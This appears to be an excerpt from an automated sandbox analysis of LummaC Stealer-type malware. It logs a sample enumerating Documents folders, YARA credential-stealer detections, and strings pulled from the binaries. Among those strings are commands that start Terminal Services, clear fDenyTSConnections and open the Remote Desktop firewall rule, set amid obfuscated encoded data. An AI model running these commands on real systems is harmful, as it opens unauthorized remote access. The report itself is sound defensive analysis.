Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: number of queries: 1001
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: b2885fa695.exe PID: 8036, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: b2885fa695.exe PID: 8036, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Contains functionality to start a terminal service
Source: 72f44ceb0a.exe, 00000024.00000002.2595429980.0000000001011000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: net start termservice
Source: 72f44ceb0a.exe, 00000024.00000002.2595429980.0000000001011000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: 72f44ceb0a.exe, 00000024.00000003.2591928551.0000000007071000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: 72f44ceb0a.exe, 00000024.00000003.2591928551.0000000007071000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: 72f44ceb0a.exe, 00000024.00000000.2584274322.0000000001011000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: net start termservice
Source: 72f44ceb0a.exe, 00000024.00000000.2584274322.0000000001011000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 00000025.00000002.2596732466.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000025.00000002.2596732466.00000000002F1000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq 